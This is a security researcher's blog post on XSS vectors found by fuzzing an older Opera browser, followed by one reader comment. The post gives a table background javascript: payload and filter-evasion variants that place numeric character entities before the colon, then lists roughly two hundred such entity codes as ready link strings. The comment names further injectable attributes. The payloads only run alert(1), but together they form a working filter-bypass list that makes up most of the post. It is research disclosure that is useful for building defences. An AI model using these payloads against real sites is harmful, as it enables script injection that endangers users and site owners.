Opera XSS vectors

It turns out I was right. Originally I thought the protocols reported by my javascript fuzzer were false positives but as like lots of my code it seems to know better than me :) I tested the context of the vectors in a normal HTML link which didn’t work correctly. But I was messing with some XSS in Hackvertor today with the latest copy of Opera and I found they worked.

Surprisingly Opera still supports the table background vector and combining my protocol discoveries you can create some cool additional vectors. The table background vector looks like this:-

<table background=javascript:alert(1)>

Now we can combine it with some of the unicode characters that work after the javascript string and before the colon:-

<table background=javascript&#14848:alert(1)>

The characters can be repeated many times like this:-

<table background=javascript&#14848&#14848&#14848&#14848&#14848:alert(1)>

Lots of other characters seem to be affected, I’ve randomly tested a few like 11520 but I haven’t verified them all. Here are a list of the characters:-

Char:9,Link:javascript&#9:
Char:10,Link:javascript&#10:
Char:13,Link:javascript&#13:
Char:58,Link:javascript&#58:
Char:2048,Link:javascript&#2048:
Char:2304,Link:javascript&#2304:
Char:3840,Link:javascript&#3840:
Char:4096,Link:javascript&#4096:
Char:4256,Link:javascript&#4256:
Char:4352,Link:javascript&#4352:
Char:4608,Link:javascript&#4608:
Char:4864,Link:javascript&#4864:
Char:5120,Link:javascript&#5120:
Char:5376,Link:javascript&#5376:
Char:5632,Link:javascript&#5632:
Char:5888,Link:javascript&#5888:
Char:6400,Link:javascript&#6400:
Char:6656,Link:javascript&#6656:
Char:7424,Link:javascript&#7424:
Char:7936,Link:javascript&#7936:
Char:7944,Link:javascript&#7944:
Char:11520,Link:javascript&#11520:
Char:12544,Link:javascript&#12544:
Char:13312,Link:javascript&#13312:
Char:13568,Link:javascript&#13568:
Char:13824,Link:javascript&#13824:
Char:14080,Link:javascript&#14080:
Char:14336,Link:javascript&#14336:
Char:14592,Link:javascript&#14592:
Char:14848,Link:javascript&#14848:
Char:15104,Link:javascript&#15104:
Char:15360,Link:javascript&#15360:
Char:15616,Link:javascript&#15616:
Char:15872,Link:javascript&#15872:
Char:16128,Link:javascript&#16128:
Char:16384,Link:javascript&#16384:
Char:16640,Link:javascript&#16640:
Char:16896,Link:javascript&#16896:
Char:17152,Link:javascript&#17152:
Char:17408,Link:javascript&#17408:
Char:17664,Link:javascript&#17664:
Char:17920,Link:javascript&#17920:
Char:18176,Link:javascript&#18176:
Char:18432,Link:javascript&#18432:
Char:18688,Link:javascript&#18688:
Char:18944,Link:javascript&#18944:
Char:19200,Link:javascript&#19200:
Char:19456,Link:javascript&#19456:
Char:19712,Link:javascript&#19712:
Char:19968,Link:javascript&#19968:
Char:20224,Link:javascript&#20224:
Char:20480,Link:javascript&#20480:
Char:20736,Link:javascript&#20736:
Char:20992,Link:javascript&#20992:
Char:21248,Link:javascript&#21248:
Char:21504,Link:javascript&#21504:
Char:21760,Link:javascript&#21760:
Char:22016,Link:javascript&#22016:
Char:22272,Link:javascript&#22272:
Char:22528,Link:javascript&#22528:
Char:22784,Link:javascript&#22784:
Char:23040,Link:javascript&#23040:
Char:23296,Link:javascript&#23296:
Char:23552,Link:javascript&#23552:
Char:23808,Link:javascript&#23808:
Char:24064,Link:javascript&#24064:
Char:24320,Link:javascript&#24320:
Char:24576,Link:javascript&#24576:
Char:24832,Link:javascript&#24832:
Char:25088,Link:javascript&#25088:
Char:25344,Link:javascript&#25344:
Char:25600,Link:javascript&#25600:
Char:25856,Link:javascript&#25856:
Char:26112,Link:javascript&#26112:
Char:26368,Link:javascript&#26368:
Char:26624,Link:javascript&#26624:
Char:26880,Link:javascript&#26880:
Char:27136,Link:javascript&#27136:
Char:27392,Link:javascript&#27392:
Char:27648,Link:javascript&#27648:
Char:27904,Link:javascript&#27904:
Char:28160,Link:javascript&#28160:
Char:28416,Link:javascript&#28416:
Char:28672,Link:javascript&#28672:
Char:28928,Link:javascript&#28928:
Char:29184,Link:javascript&#29184:
Char:29440,Link:javascript&#29440:
Char:29696,Link:javascript&#29696:
Char:29952,Link:javascript&#29952:
Char:30208,Link:javascript&#30208:
Char:30464,Link:javascript&#30464:
Char:30720,Link:javascript&#30720:
Char:30976,Link:javascript&#30976:
Char:31232,Link:javascript&#31232:
Char:31488,Link:javascript&#31488:
Char:31744,Link:javascript&#31744:
Char:32000,Link:javascript&#32000:
Char:32256,Link:javascript&#32256:
Char:32512,Link:javascript&#32512:
Char:32768,Link:javascript&#32768:
Char:33024,Link:javascript&#33024:
Char:33280,Link:javascript&#33280:
Char:33536,Link:javascript&#33536:
Char:33792,Link:javascript&#33792:
Char:34048,Link:javascript&#34048:
Char:34304,Link:javascript&#34304:
Char:34560,Link:javascript&#34560:
Char:34816,Link:javascript&#34816:
Char:35072,Link:javascript&#35072:
Char:35328,Link:javascript&#35328:
Char:35584,Link:javascript&#35584:
Char:35840,Link:javascript&#35840:
Char:36096,Link:javascript&#36096:
Char:36352,Link:javascript&#36352:
Char:36608,Link:javascript&#36608:
Char:36864,Link:javascript&#36864:
Char:37120,Link:javascript&#37120:
Char:37376,Link:javascript&#37376:
Char:37632,Link:javascript&#37632:
Char:37888,Link:javascript&#37888:
Char:38144,Link:javascript&#38144:
Char:38400,Link:javascript&#38400:
Char:38656,Link:javascript&#38656:
Char:38912,Link:javascript&#38912:
Char:39168,Link:javascript&#39168:
Char:39424,Link:javascript&#39424:
Char:39680,Link:javascript&#39680:
Char:39936,Link:javascript&#39936:
Char:40192,Link:javascript&#40192:
Char:40448,Link:javascript&#40448:
Char:40704,Link:javascript&#40704:
Char:40960,Link:javascript&#40960:
Char:41216,Link:javascript&#41216:
Char:41472,Link:javascript&#41472:
Char:41728,Link:javascript&#41728:
Char:41984,Link:javascript&#41984:
Char:43008,Link:javascript&#43008:
Char:44032,Link:javascript&#44032:
Char:44288,Link:javascript&#44288:
Char:44544,Link:javascript&#44544:
Char:44800,Link:javascript&#44800:
Char:45056,Link:javascript&#45056:
Char:45312,Link:javascript&#45312:
Char:45568,Link:javascript&#45568:
Char:45824,Link:javascript&#45824:
Char:46080,Link:javascript&#46080:
Char:46336,Link:javascript&#46336:
Char:46592,Link:javascript&#46592:
Char:46848,Link:javascript&#46848:
Char:47104,Link:javascript&#47104:
Char:47360,Link:javascript&#47360:
Char:47616,Link:javascript&#47616:
Char:47872,Link:javascript&#47872:
Char:48128,Link:javascript&#48128:
Char:48384,Link:javascript&#48384:
Char:48640,Link:javascript&#48640:
Char:48896,Link:javascript&#48896:
Char:49152,Link:javascript&#49152:
Char:49408,Link:javascript&#49408:
Char:49664,Link:javascript&#49664:
Char:49920,Link:javascript&#49920:
Char:50176,Link:javascript&#50176:
Char:50432,Link:javascript&#50432:
Char:50688,Link:javascript&#50688:
Char:50944,Link:javascript&#50944:
Char:51200,Link:javascript&#51200:
Char:51456,Link:javascript&#51456:
Char:51712,Link:javascript&#51712:
Char:51968,Link:javascript&#51968:
Char:52224,Link:javascript&#52224:
Char:52480,Link:javascript&#52480:
Char:52736,Link:javascript&#52736:
Char:52992,Link:javascript&#52992:
Char:53248,Link:javascript&#53248:
Char:53504,Link:javascript&#53504:
Char:53760,Link:javascript&#53760:
Char:54016,Link:javascript&#54016:
Char:54272,Link:javascript&#54272:
Char:54528,Link:javascript&#54528:
Char:54784,Link:javascript&#54784:
Char:55040,Link:javascript&#55040:

One Response to “Opera XSS vectors”

  1. .mario writes:

    Nice research! But don’t forget:

    <bgsound src=
    <body background=
    <iframe src=
    <embed src=
    <img src=
    <image src=

    :)

    Greetings,
    .mario